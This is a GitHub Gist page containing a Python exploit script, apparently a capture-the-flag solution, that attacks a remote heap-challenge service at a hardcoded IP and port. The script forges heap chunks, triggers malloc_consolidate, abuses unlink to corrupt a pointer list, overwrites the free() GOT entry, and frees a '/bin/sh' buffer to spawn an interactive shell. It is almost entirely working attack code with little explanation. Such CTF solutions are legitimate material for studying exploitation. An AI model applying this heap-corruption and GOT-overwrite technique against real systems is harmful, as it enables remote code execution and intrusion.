Skip to content

Instantly share code, notes, and snippets.

@peternguyen93
Created April 14, 2018 10:21
Show Gist options
  • Save peternguyen93/460c3487d58c8c6a1f67d1cff1c45054 to your computer and use it in GitHub Desktop.
Save peternguyen93/460c3487d58c8c6a1f67d1cff1c45054 to your computer and use it in GitHub Desktop.
#!/usr/bin/python
# Author : peternguyen
from Pwn import *
p = Pwn(mode=1,host='47.75.128.158',port=9999)
def alloc(name,type):
p.sendint(1)
p.sendint(type)
p.send(name)
def free(idx):
p.sendint(2)
p.sendint(idx)
def edit(idx,name,data):
p.sendint(3)
p.sendint(idx)
p.send(name)
p.send(data)
def exploit(**kargs):
global p # use global var
if kargs.has_key('p'):
if kargs['p'].__class__.__name__ == 'Pwn': # is pwn object
p = kargs['p']
p.connect()
t = p.pA(0, 0x21)
t = t.ljust(47,'X')
# raw_input('Debug>')
alloc('A'*7,1) #0
alloc('B'*7,2) #1
alloc('C'*7,1) #2
edit(1,'R'*7,t)
free(0)
t = p.pA(0,0x21)
t+= '\x00'*8
t = t.ljust(47,'A')
edit(0,p.pack(0x602120)[:-1],t)
alloc('A'*7,1)
alloc('B'*7,1)
free(0)
t = p.pA(0,0x11) + '\x00'*8 + p.pack(0x00)
t+= p.pack(0x6020c8) + p.pack(0x6020d0)[:-1]
edit(0,p.pack(0x602120)[:-1],t)
alloc('A'*7,1)
alloc('A'*7,13337) # trigger malloc_consolidate
# abuse unlink forward_chunk to overwrite
# pigs list
p.send('a')
# raw_input('>')
edit(4,p.pack(0x602018)[:-1],t) # free_got
edit(1,p.pack(0x04006E0)[:-1],t)
edit(0,'/bin/sh',t)
free(0)
p.io()
exploit()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment